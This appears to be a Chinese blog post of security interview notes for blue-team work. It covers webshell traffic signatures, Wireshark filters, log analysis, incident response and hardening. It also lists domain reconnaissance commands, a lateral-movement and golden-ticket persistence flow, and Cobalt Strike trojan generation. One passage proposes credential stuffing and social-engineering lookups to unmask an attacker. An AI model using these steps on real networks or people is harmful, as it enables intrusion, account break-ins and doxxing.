class="toc-text">xss漏洞（跨站脚本攻击）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-xss%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E5%8F%8A%E9%98%B2%E6%8A%A4"><span class="toc-text">(1)xss漏洞原理及防护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E9%98%B2%E6%8A%A4%E6%89%8B%E6%AE%B5"><span class="toc-text">(2)防护手段:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-xss%E7%B1%BB%E5%9E%8B%EF%BC%8C%E5%8C%BA%E5%88%AB%EF%BC%9F%E5%93%AA%E7%A7%8D%E7%B1%BB%E5%9E%8B%E5%8D%B1%E5%AE%B3%E6%9C%80%E5%A4%A7%EF%BC%9F%E4%B8%BA%E4%BB%80%E4%B9%88"><span class="toc-text">(3)xss类型，区别？哪种类型危害最大？为什么</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E6%A0%87%E7%AD%BE"><span class="toc-text">(4)标签</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#csrf%E6%BC%8F%E6%B4%9E%EF%BC%88%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0%EF%BC%89"><span class="toc-text">csrf漏洞（跨站请求伪造）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81csrf%E5%8E%9F%E7%90%86%EF%BC%9F"><span class="toc-text">1、csrf原理？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E4%BF%AE%E5%A4%8D%EF%BC%9A"><span class="toc-text">2、修复：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81%E7%B1%BB%E5%9E%8B"><span class="toc-text">3、类型</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4%E3%80%81%E5%8D%B1%E5%AE%B3%EF%BC%9A"><span class="toc-text">4、危害：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5%E3%80%81%E4%B8%8Exss%E7%9A%84%E5%8C%BA%E5%88%AB%EF%BC%9A"><span class="toc-text">5、与xss的区别：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6%E3%80%81%E4%B8%8Essrf%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-text">6、与ssrf的区别</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ssrf%E6%BC%8F%E6%B4%9E%EF%BC%88%E6%9C%8D%E5%8A%A1%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0%EF%BC%89"><span class="toc-text">ssrf漏洞（服务端请求伪造）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%8E%9F%E7%90%86"><span class="toc-text">(1)原理:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-ssrf%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D%EF%BC%9A"><span class="toc-text">(2)ssrf漏洞修复：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-ssrf%E5%88%A9%E7%94%A8"><span class="toc-text">(3)ssrf利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF"><span class="toc-text">(4)绕过姿势</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xxe%E6%BC%8F%E6%B4%9E%EF%BC%88%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-text">xxe漏洞（外部实体注入）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%8E%9F%E7%90%86%EF%BC%9A"><span class="toc-text">(1)原理：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F%EF%BC%9A"><span class="toc-text">(2)利用方式：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E4%BF%AE%E5%A4%8D%E9%98%B2%E5%BE%A1%EF%BC%9A"><span class="toc-text">(3)修复防御：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E"><span class="toc-text">逻辑漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-1"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E8%B6%8A%E6%9D%83%EF%BC%9F%E5%88%86%E7%B1%BB%EF%BC%9F"><span class="toc-text">什么是越权？分类？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F"><span class="toc-text">常见的逻辑漏洞有哪些？</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E"><span class="toc-text">命令执行漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86%EF%BC%9A-1"><span class="toc-text">原理：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E5%8C%BA%E5%88%AB"><span class="toc-text">命令执行代码执行区别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%9D%A1%E4%BB%B6"><span class="toc-text">漏洞条件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E5%AE%9A%E4%B9%89"><span class="toc-text">基本定义</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%EF%BC%88%E5%8D%B1%E5%AE%B3%EF%BC%89"><span class="toc-text">利用（危害）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1"><span class="toc-text">防御</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E"><span class="toc-text">反序列化漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-2"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0"><span class="toc-text">漏洞成因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0-1"><span class="toc-text">常用函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E7%9A%84%E9%AD%94%E6%9C%AF%E5%87%BD%E6%95%B0"><span class="toc-text">常用的魔术函数</span></a></li></ol></li></ol>
                    </div>
                

                
                <section id="post-body">
                    <h1 id="流量"><a href="#流量" class="headerlink" title="流量"></a>流量</h1><h2 id="怎么确定是真实攻击还是误报"><a href="#怎么确定是真实攻击还是误报" class="headerlink" title="怎么确定是真实攻击还是误报"></a>怎么确定是真实攻击还是误报</h2><p>通过设备的告警信息，流量特征（攻击特征），去查看数据包里面（请求包、请求体、返回包、返回体），是否存在相应的攻击特征，如果不包含攻击载荷，为误报<br>以攻击IP为索引，去查看（护网开始-现在），是否有其它攻击行为。<br>查看攻击方向：内对内、内对外、外对内。内对内的话误报率较大，但也要看具体的流量，最好上机排查。<br>本地复现：不用客户的网络去访问，可以用其他的网络，比如手机热点。</p>
<h2 id="struts2命令执行的流量特征"><a href="#struts2命令执行的流量特征" class="headerlink" title="struts2命令执行的流量特征"></a>struts2命令执行的流量特征</h2><p>一般Struts2框架的接口会以.do、.action结尾；struts2一些常见的关键字：memberAcecess,getRuntime,println,双引号，单引号，等号，括号之类的符号。</p>
<h2 id="谈谈蚁剑-x2F-菜刀-x2F-冰蝎-x2F-哥斯拉的特征"><a href="#谈谈蚁剑-x2F-菜刀-x2F-冰蝎-x2F-哥斯拉的特征" class="headerlink" title="谈谈蚁剑&#x2F;菜刀&#x2F;冰蝎&#x2F;哥斯拉的特征"></a>谈谈蚁剑&#x2F;菜刀&#x2F;冰蝎&#x2F;哥斯拉的特征</h2><p>蚁剑AntSword:支持自定义加密，但shell不稳定，且对JSP兼容性比较差；特征码为data:(“display_errors” AND “set_time_limit(0)”) agent:”antSword&#x2F;v2.0”<br>菜刀：流量Base64编码，特征比较固定。特征码：base64_decode”;eval;z0<br>冰蝎Behinder：流量动态AES加密，一般http包头中 content-type为application&#x2F;octet-stream；若发现有冰蝎Webshell文件上传的告警事件，可根据数据包中的上传路径以登录服务器排查文件的方式进一步确认冰蝎 WebShell 是否被上传成功。若访问发现相关文件存在，确认 WebShell 成功上传到了服务器。<br>哥斯拉Godzilla：基于流量、HTTP全加密的webshell工具，看不出有明显的攻击特征，需要结合流量找到哥斯拉webshell上传成功的流量来进行分析和判断，另外该工具自带了 一些插件模块，实现了写无文件 WebShell 等强大的功能，可以伪造UA头和Accept头，消除请求包和响应包中的特征。</p>
<h2 id="SQL注入有哪些常见的特征"><a href="#SQL注入有哪些常见的特征" class="headerlink" title="SQL注入有哪些常见的特征"></a>SQL注入有哪些常见的特征</h2><p>一些常见的关键字：select,where、order、union、update、floor、exec、information_schema、extractvalue、delete、insert、ascii、table、from等<br>一些常见的sql函数：user()、@@version、ctxsys.drithsx.sn()等针对双引号、单引号、等号之类的符号，可能会进行相关的编码操作，例如url编码，需要注意。</p>
<h1 id="溯源"><a href="#溯源" class="headerlink" title="溯源"></a>溯源</h1><h2 id="溯源方法以及介绍"><a href="#溯源方法以及介绍" class="headerlink" title="溯源方法以及介绍"></a>溯源方法以及介绍</h2><p>溯源方法<br>攻击源捕获——溯源处置——攻击者画像<br>攻击源捕获来源<br>1.审查邮件钓鱼<br>2.获取安全设备数据进行分析，特别是流量数据；<br>3.网络资产所在的服务器运行状态；<br>4.中间件日志信息查看；<br>5.合理运用蜜罐系统进行溯源追踪。<br>溯源处置<br>1.域名查询<br>2.IP查询<br>3.身份查询<br>4.文件查询<br>攻击者画像<br>1.攻击路径<br>2.攻击目的<br>3.网络代理<br>4.攻击手法<br>5.攻击者的身份画像，由四个部分组成，分别是：<br>虚拟身份：ID、昵称、网名<br>真实身份：姓名、家庭&#x2F;办公物理位置<br>联系方式：手机号、QQ&#x2F;微信、邮箱<br>组织情况：单位名称、职位信息</p>
<h2 id="流量溯源"><a href="#流量溯源" class="headerlink" title="流量溯源"></a>流量溯源</h2><p>可利用流量工具 wireshark 进行溯源：</p>
<p>查看 eval、 z0、 shell whoami 等关键字，查看出现次数过多的时候， 需要查看是哪个页面发起的请求，有可能是 webshell</p>
<p>通过 WireShark 工具快速搜索关键字，定位到异常流量包</p>
<p>找出异常 IP 和所上传的内容，查看是否为 webshell</p>
<p>如何定位到攻击IP：</p>
<p>首先通过选择 - 统计 - 对话查看流量的走向情况， 定位可疑的 IP 地址</p>
<p>根据定位到的 IP 地址，尝试对上传的 webshell 进行定位</p>
<p>ip.addr &#x3D;&#x3D; ip &amp;&amp; http matches<br>“uploadllevallselectlxp_cmdshell” &amp;&amp; http.request.method &#x3D;&#x3D; “POST”<br>查找到 webshell 后尝试溯源漏洞位置</p>
<p>http.request.uri contains “webshell.php”<br>定位到最开始 webshell 执行或上传的时候<br>根据最开始的 HTTP 上传包或者其他漏洞特征定位漏洞类型</p>
<h2 id="实际情况的溯源"><a href="#实际情况的溯源" class="headerlink" title="实际情况的溯源"></a>实际情况的溯源</h2><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/fevents/334657.html">https://www.freebuf.com/fevents/334657.html</a></p>
<h1 id="日志"><a href="#日志" class="headerlink" title="日志"></a>日志</h1><h2 id="给你一个比较大的日志，应该如何分析"><a href="#给你一个比较大的日志，应该如何分析" class="headerlink" title="给你一个比较大的日志，应该如何分析"></a>给你一个比较大的日志，应该如何分析</h2><p>攻击规则匹配，通过正则匹配日志中的攻击请求</p>
<p>统计方法，统计请求出现次数，次数少于同类请求平均次数则为异常请求</p>
<p>白名单模式，为正常请求建立白名单，不在名单范围内则为异常请求</p>
<p>HMM 模型，类似于白名单，不同点在于可对正常请求自动化建立模型，从而通过正常模型找出不匹配者则为异常请求</p>
<p>借助日志分析工具</p>
<p>如 LogForensics 腾讯实验室 <a target="_blank" rel="noopener" href="https://security.tencent.com/index.php/opensource/detail/15">https://security.tencent.com/index.php/opensource/detail/15</a></p>
<h2 id="你能大概说一下，比如数据包或者日志，你的分析思路是什么"><a href="#你能大概说一下，比如数据包或者日志，你的分析思路是什么" class="headerlink" title="你能大概说一下，比如数据包或者日志，你的分析思路是什么"></a>你能大概说一下，比如数据包或者日志，你的分析思路是什么</h2><p>用流量监测的安全设备，比如天眼，查看报文，分析报文里和 host 和网站目录路径，查看是否可疑，使用微步查询 host 是否为恶意，使用 wireshark 对数据包深度分析</p>
<p>看一下请求的网站路径，源 IP 与目的 IP 地址，host 字段的值以及发包内容等</p>
<p>工具有 wireshark，网站的话微步在线等威胁情报中心</p>
<h2 id="文件上传和命令执行，有看过相关日志吗"><a href="#文件上传和命令执行，有看过相关日志吗" class="headerlink" title="文件上传和命令执行，有看过相关日志吗"></a>文件上传和命令执行，有看过相关日志吗</h2><p>文件：可能在系统有上传功能或者有文本编辑器，看一下是否有 base64 加密或者 url 加密，解码验证一下是否有恶意代码</p>
<p>系统日志：有没有 web 容器做了一些危险行为，比如 bash 反弹 shell 等</p>
<p>网络应用日志：有没有异常的网站文件，类似 webshell 等，就有可能是命令执行</p>
<h2 id="服务中了webshell怎样从日志找webshell位置，被拿shell后怎么应急，怎样快速定位shell"><a href="#服务中了webshell怎样从日志找webshell位置，被拿shell后怎么应急，怎样快速定位shell" class="headerlink" title="服务中了webshell怎样从日志找webshell位置，被拿shell后怎么应急，怎样快速定位shell"></a>服务中了webshell怎样从日志找webshell位置，被拿shell后怎么应急，怎样快速定位shell</h2><p>从日志 流量 文件开始，先定位位置 查看敏感目录 tmp usr&#x2F;sbin etc&#x2F;ssh ，对新创建文件，修改文件等进行查看，找特殊权限文件 比如777 。流量的话 从ua和playload去分析。比如菜刀连jsp木马：第一个参数是a-q，这个是不会变的，第二个是编码，第三个是 playload。日志的话从找到的shell时间点去关联分析，可以还原攻击手法<br>快速定位 就是看进程和内存 看占用时间长和占用率高的 </p>
<h1 id="内网"><a href="#内网" class="headerlink" title="内网"></a>内网</h1><h2 id="内网渗透流程："><a href="#内网渗透流程：" class="headerlink" title="内网渗透流程："></a>内网渗透流程：</h2><p> 拿到跳板后，先探测一波内网存活主机，用net user &#x2F;domian命令查看跳板机是否在域内，探测存活主机、提权、提取hash、进行横向移动，定位dc位置，查看是否有能直接提权域管的漏洞，拿到dc控制权后进行提权，然后制作黄金票据做好维权，清理一路过来的日志擦擦脚印</p>
<p>信息收集</p>
<h2 id="主机信息收集"><a href="#主机信息收集" class="headerlink" title="主机信息收集"></a>主机信息收集</h2><p>1.网络配置 ipconfig &#x2F;all<br>2.操作系统 systeminfo | findstr &#x2F;B &#x2F;C:”OS 名称” &#x2F;C:”OS 版本”<br>3.软件信息 systeminfo | findstr &#x2F;B &#x2F;C:”OS Name” &#x2F;C:”OS Version”<br>4.服务信息 wmic &#x2F;namespace:\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe<br>5.用户列表 net user<br>6.本地管理员信息 net localgroup administrators<br>7.端口信息 netstat –ano<br>8.补丁信息 wmic qfe get Caption,Description,HotFixID,InstalledOn<br>9.查防火墙 netsh firewall show config</p>
<h2 id="域内信息收集"><a href="#域内信息收集" class="headerlink" title="域内信息收集"></a>域内信息收集</h2><p>是否有域 使用ipconfig &#x2F;all命令可以查看网关IP地址、DNS的IP地址以及判断当前主机 是否在域内：通过反 向解析查询命令nslookup来解析域名的IP地址，使用解析出来的IP地 址进行对比，判断域控制器和 DNS服务器是否在同一台服务器上<br>登录域信息 net config workstation 域内信息收集<br>ICMP探测内网 for &#x2F;L %I in (1,1,254) DO <span class="label label-primary">@ping</span> -w 1 -n 1 192.168.174.%I | findstr “TTL&#x3D;”<br>ARP探测内网<br>端口信息收集<br>查询域信息 net view &#x2F;domain<br>查询域主机 net view &#x2F;domain:XXX<br>查询域用户 net group &#x2F;domain<br>查找域控 Nslookup -type&#x3D;SRV _ldap._tcp net time &#x2F;domain net group “Domain Controllers” &#x2F;domain<br>查域用户信息 net user &#x2F;domain<br>查询域管理员 net group “Domain Admins” &#x2F;domain<br>查询域sid信息 whoami &#x2F;all</p>
<h2 id="内网环境不出网"><a href="#内网环境不出网" class="headerlink" title="内网环境不出网"></a>内网环境不出网</h2><p>1.通过webshell实现内网socket代理</p>
<p>2.正向链接 </p>
<p>3.ssh隧道 </p>
<p>4.协议不同出网的方式不同，如dns对应dnscat2 tcp对应 </p>
<p>5.测试是否是特定协议或端口出网 </p>
<h2 id="内网报警了怎么办"><a href="#内网报警了怎么办" class="headerlink" title="内网报警了怎么办"></a>内网报警了怎么办</h2><p>首先就要是地位到具体的那一台机器，既然报警那就说明知道了具体的漏洞类型，加相应的补丁打上，以linux为主（一般都会问linux的），查看&#x2F;var&#x2F;log&#x2F;secure系统日志，查看登录失败的记录，还有Linux历史命令–&gt;home目录的bash_histor，查看执行过的命令。</p>
<p>在利用webshell或者是shell查杀工具查杀，查看tmp目录下是非有带有免杀的木马。彻底清除。再到全流量分析的机子上看，是非有经过其他的机器。</p>
<p>拿到攻击ip之后到线上的一些网站查看主机类型，比如360或者微步上，查看是非是傀儡机，vps跳板，或者是国内个人云主机。</p>
<p>如果是个人云主机，就可以通过whois查看是非有最近绑定的域名，或者绑定者的邮箱。</p>
<p>知道邮箱之后就可以反查询出qq号说多少，再利用社工查询到手机号，到一个知名的网站上查询这个手机号有没有注册过什么网站，可以去这些网站通过撞库的方法登入，这样就可以拿到这个攻击者的身份证，学校，地址这些了。<br>（思路是应急响应-&gt;加固-&gt;溯源</p>
<h1 id="应急响应"><a href="#应急响应" class="headerlink" title="应急响应"></a>应急响应</h1><h2 id="网站被挂马如何应急"><a href="#网站被挂马如何应急" class="headerlink" title="网站被挂马如何应急"></a>网站被挂马如何应急</h2><p> 1.取证，登录服务器，备份，检查服务器敏感目录，查毒（搜索后门文件-注意文件的时间， 用户，后缀等属性），调取日志（系统，中间件日志，WAF日志等）；<br> 2.处理，恢复备份（快照回滚最近一次），确定入侵方法（漏洞检测并进行修复）<br> 3.溯源，查入侵IP，入侵手法（网路攻击事件）的确定等<br> 4.记录，归档——–预防-事件检测-抑制-根除-恢复-跟踪-记录通用漏洞的应对等其他 安全应急事件 </p>
<h2 id="设备报警，SQL注入的报警，如果是真实攻击，怎么判断他攻击是否成功，如果成功怎么处理"><a href="#设备报警，SQL注入的报警，如果是真实攻击，怎么判断他攻击是否成功，如果成功怎么处理" class="headerlink" title="设备报警，SQL注入的报警，如果是真实攻击，怎么判断他攻击是否成功，如果成功怎么处理"></a>设备报警，SQL注入的报警，如果是真实攻击，怎么判断他攻击是否成功，如果成功怎么处理</h2><p> 先看ip，如果ip是公司内部的再看内部人员有没有相关操作，如果不是公司人员业务的操作那就是攻击了，<br> 然后分析payload,分析它写的payload安全设备能否它进行过滤拦截，如果它确实能绕过，那就应该攻击成功了，<br> 成功的话赶紧上报，做应急响应，做出相应处理，添加过滤规则，修改数据库中能修改的数据比如管理员账号密码啥的 </p>
<h2 id="应急响应-1"><a href="#应急响应-1" class="headerlink" title="应急响应"></a>应急响应</h2><p><a target="_blank" rel="noopener" href="https://raspy-move-01d.notion.site/bedcc90d250f46219dded510ef76b49b?v=337a42cfe45b4bdda28ffeec8ce26cf7">https://raspy-move-01d.notion.site/bedcc90d250f46219dded510ef76b49b?v=337a42cfe45b4bdda28ffeec8ce26cf7</a></p>
<h1 id="护网经历"><a href="#护网经历" class="headerlink" title="护网经历"></a>护网经历</h1><h2 id="简历有护网经历，你能谈谈护网的情况吗"><a href="#简历有护网经历，你能谈谈护网的情况吗" class="headerlink" title="简历有护网经历，你能谈谈护网的情况吗"></a>简历有护网经历，你能谈谈护网的情况吗</h2><p>参加过护网蓝队，负责事件研判工作，主要使用 ips，ids 等设备做流量监控与日志分析工作判断安全事件是否为误判</p>
<p>监控、研判、处置、溯源</p>
<p>对安全管理中心发出的态势排查单进行排查，并将排查结果反馈给安全管理中心，对安全管理中心发出的封堵工单和解封工单进行对应的封堵与解封，每两小时反馈一次排查结果、设备巡检报告、封堵情况。查看呼池 DDOS 设备，记录并排查告警信息</p>
<h2 id="蓝队研判"><a href="#蓝队研判" class="headerlink" title="蓝队研判"></a>蓝队研判</h2><p>研判工作要充分利用已有安全设备（需要提前了解客户的网络拓扑以及部署设备情况），分析其近期的设备告警，将全部流量日志（日志条件：源地址，目的地址，端口，事件名称，时间，规则 ID，发生 次数等）根据研判标准进行筛选（像挖矿、蠕虫、病毒、拒绝服务这类不太可能为攻击方发起的攻击的事件，直接过滤掉，减少告警数量），一般情况下，真实攻击不可能只持续一次，它一定是长时间、周期性、多 IP 的进行攻击</p>
<p>对于告警结合威胁情报库如：微步、奇安信威胁情报中心、绿盟威胁情报云等对于流量日志的原 IP 地址进行分析，判断其是否为恶意攻击，推荐使用微步的插件，如果确认为攻击行为或者不能确认是否为攻击行为，进行下一步操作，在之前准备好的表格中查找 IP 是否为客户内网部署的设备，如果不是，继续进行下一步，在事件上报平台查看是否有其他人提交过，如果没有，则上报</p>
<p>然后根据流量日志，对请求数据包和返回数据包分析判断其是否为误报，需要留意 X-Forwarded-For（简称XFF）和 x-real-ip 可以了解些 webshell 工具的流量特征，尤其是免杀 webshell，有可能不会被设备识别</p>
<p>最后上报事件时，尽可能提供完整的截图，包括源 ip、目的ip，请求包请求体，响应包响应体等重要信息，以方便后续人员研判溯源</p>
<h1 id="安全工具"><a href="#安全工具" class="headerlink" title="安全工具"></a>安全工具</h1><h2 id="入侵防御系统IPS"><a href="#入侵防御系统IPS" class="headerlink" title="入侵防御系统IPS"></a>入侵防御系统IPS</h2><p>是计算机网络安全设施，是对防病毒软件和防火墙的补充。入侵预防系统是一部能够监视网络或网络设备的网络数据传输行为的计算机网络安全设备，能够即时的中断、调整或隔离一些不正常或是具有伤害性的网络数据传输行为。</p>
<h2 id="入侵检测系统IDS"><a href="#入侵检测系统IDS" class="headerlink" title="入侵检测系统IDS"></a>入侵检测系统IDS</h2><p>积极主动的防护措施，按照一定的安全策略，通过软件，硬件对网络，系统的运行进行实时的监控，尽可能地发现网络攻击行为，积极主动的处理攻击，保证网络资源的机密性，完整性和可用性。</p>
<h2 id="防火墙"><a href="#防火墙" class="headerlink" title="防火墙"></a>防火墙</h2><p>防火墙是位于两个(或多个)网络间，实行网络间访问或控制的一组组件集合之硬件或软件。隔离网络，制定出不同区域之间的访问控制策略来控制不同信任程度区域间传送的数据流。</p>
<h2 id="数据库审计系统"><a href="#数据库审计系统" class="headerlink" title="数据库审计系统"></a>数据库审计系统</h2><p>是对数据库访问行为进行监管的系统，通过镜像或者探针的方式采集所有数据库的访问流量，并基于SQL语法，语义的解析技术，记录下对数据库所有访问和操作行为，例如访问数据的用户IP，账号，时间等等，对数据进行操作的行为等等。</p>
<h2 id="日志审计系统"><a href="#日志审计系统" class="headerlink" title="日志审计系统"></a>日志审计系统</h2><p>日志审计系统能够通过主被动结合的手段，实时且不间断的采集用户网络中不同厂商的安全设备，网络设备，主机，操作系统以及各种应用系统产生的海量日志信息，并将这些信息汇集到审计中心，进行集中化存储，备份，查询，审计，告警，响应，并出具丰富的报表报告，获悉全网的整体安全运行态势，同时满足等保关于安全管理中心的日志保存时间大于6个月的要求。</p>
<h2 id="堡垒机"><a href="#堡垒机" class="headerlink" title="堡垒机"></a>堡垒机</h2><p>是针对内部运维人员的运维安全审计系统。主要功能是对运维人员的运维操作进行审计和权限控制(比如要登录某些平台或者系统只能通过堡垒机才可以，不用堡垒机是无法访问的)。同时堡垒机还有账号集中管理，单点登录(在堡垒机上登录即可实现对多个其他平台的无密登录)等功能。</p>
<h2 id="漏洞扫描系统"><a href="#漏洞扫描系统" class="headerlink" title="漏洞扫描系统"></a>漏洞扫描系统</h2><p>漏洞扫描工具或者设备是基于漏洞数据库，通过扫描等手段对指定的远程或本地计算机系统的安全脆弱性进行检测，发现可利用漏洞的一种安全检测系统(我们常用的针对WEB站点进行扫描的工具和此处漏洞扫描系统不是一个概念)。</p>
<h2 id="数据安全态势感知平台"><a href="#数据安全态势感知平台" class="headerlink" title="数据安全态势感知平台"></a>数据安全态势感知平台</h2><p>以大数据平台为基础，通过收集多元，异构的海量日志，利用关联分析，机器学习，威胁情报，可视化等技术，帮助用户持续监测网络安全态势，实现从被动防御向积极防御的进阶。</p>
<h2 id="终端安全管理系统"><a href="#终端安全管理系统" class="headerlink" title="终端安全管理系统"></a>终端安全管理系统</h2><p>是集防病毒，终端安全管控，终端准入，终端审计，外设管控，EDR等功能于一体，兼容不同操作系统和计算机平台，帮助客户实现平台一体化，功能一体化，数据一体化的终端安全立体防护。</p>
<h2 id="WAF"><a href="#WAF" class="headerlink" title="WAF"></a>WAF</h2><p>WAF是以网站或应用系统为核心的安全产品，通过对HTTP或HTTPS的Web攻击行为进行分析并拦截，有效的降低网站安全风险。产品主要部署在网站服务器的前方。通过特征提取和分块检索技术进行模式匹配来达到过滤，分析，校验网络请求包的目的，在保证正常网络应用功能的同时，隔绝或者阻断无效或者非法的攻击请求。</p>
<h2 id="蜜罐"><a href="#蜜罐" class="headerlink" title="蜜罐"></a>蜜罐</h2><p>蜜罐是一种安全威胁的主动防御技术，它通过模拟一个或多个易受攻击的主机或服务来吸引攻击者，捕获攻击流量与样本，发现网络威胁，提取威胁特征，蜜罐的价值在于被探测，攻陷。</p>
<h2 id="WAF和IPS的区别"><a href="#WAF和IPS的区别" class="headerlink" title="WAF和IPS的区别"></a>WAF和IPS的区别</h2><p>答：IPS位于防火墙和网络的设备之间，防火墙可以拦截底层攻击行为，但对应用层     的深层攻击行为无能为力。IPS是对防火墙的补充。综合能力更强一些；WAF是工作在应用层的防火墙，主要对web请求&#x2F;响应进行防护。</p>
<h2 id="CS是什么东西，知道怎么使用吗？"><a href="#CS是什么东西，知道怎么使用吗？" class="headerlink" title="CS是什么东西，知道怎么使用吗？"></a>CS是什么东西，知道怎么使用吗？</h2><p>简介<br>cs是一款渗透测试工具,cs分为客户端与服务端，linux服务端是一个，windows客户端可以有多个，可用于团队分布式协同操作。<br>功能<br>cs集成了端口转发，服务扫描，自动化溢出，多模式端口监听，windows exe 木 马生成，windows dll 木马生成，java 木马生成，office 宏病毒生成，木马捆绑。钓鱼攻击等功能。<br>使用<br>一般使用步骤就是，先启动服务端，然后启动客户端连接获得一个可视化的界面，新建监听器来接收会话，生成木马文件(常见.exe可执行文件，office宏病毒，html应用程序类型的后门文件)，上传到受害者主机，当受害者运行该木马文件时目标主机就在CS上线了。</p>
<h1 id="加固"><a href="#加固" class="headerlink" title="加固"></a>加固</h1><h2 id="linux安全加固"><a href="#linux安全加固" class="headerlink" title="linux安全加固"></a>linux安全加固</h2><p>设置有效的密码策略，防止攻击者破解出密码<br>应启用登录失败处理功能，可采取结束会话、限制非法登录次数和自动退出等措施。<br>删除多余的、过期的帐户，避免共享帐户的存在。<br>开启审核策略，若日后系统出现故障、安全事故则可以查看系统日志文件，排除故障、追查入侵者的信息等。<br>保护审计记录，避免受到未预期的删除、修改或覆盖等。<br>关闭与系统业务无关或不必要的服务，减小系统被黑客被攻击、渗透的风险。<br>操作系统遵循最小安装的原则，仅安装需要的组件和应用程序，并通过设置升级服务器等方式保持系统补丁及时得到更新。<br>对接入服务器的IP、方式等进行限制，可以阻止非法入侵。<br>设置登录超时时间，释放系统资源，也提高服务器的安全性</p>
<h2 id="windows-安全加固"><a href="#windows-安全加固" class="headerlink" title="windows 安全加固"></a>windows 安全加固</h2><p>密码复杂度：设置有效的密码策略，防止攻击者破解出密码。<br>账号锁定策略：应启用登录失败处理功能，可采取结束会话、限制非法登录次数和自动退出等措施<br>设置访问策略：应启用访问控制功能，依据安全策略控制用户对资源的访问。<br>关闭默认共享：应根据管理用户的角色分配权限，实现管理用户的权限分离，仅授予管理用户所需的最小权限。<br>删除多余账号：删除或禁用临时、过期及可疑的帐号，防止被非法利用。<br>开启审核策略：开启审核策略，若日后系统出现故障、安全事故则可以查看系统日志文件，排除故障、追查入侵者的信息等。<br>及时清理内存信息：及时清理存放在系统中的用户鉴别信息，防止信息外泄，被黑客利用<br>卸载冗余组件：卸载WScript.Shell, Shell.application这两个组件，防止黑客通过脚本来提权。<br>关闭不必要服务：关闭与系统业务无关或不必要的服务，减小系统被黑客被攻击、渗透的风险<br>安装杀毒软件：应安装防恶意代码软件，并及时更新防恶意代码软件版本和恶意代码库。<br>设置屏幕保护：应根据安全策略设置登录终端的操作超时锁定。</p>
<h2 id="文件上传加固方法？"><a href="#文件上传加固方法？" class="headerlink" title="文件上传加固方法？"></a>文件上传加固方法？</h2><p>后端限制文件上传白名单，头像不允许上传 svg<br>上传后文件随机重命名，不要输出保存文件位置<br>图片文件可以二次渲染，使用对象存储 oss<br>文件目录取消执行权限，PHP 设置 basedir</p>
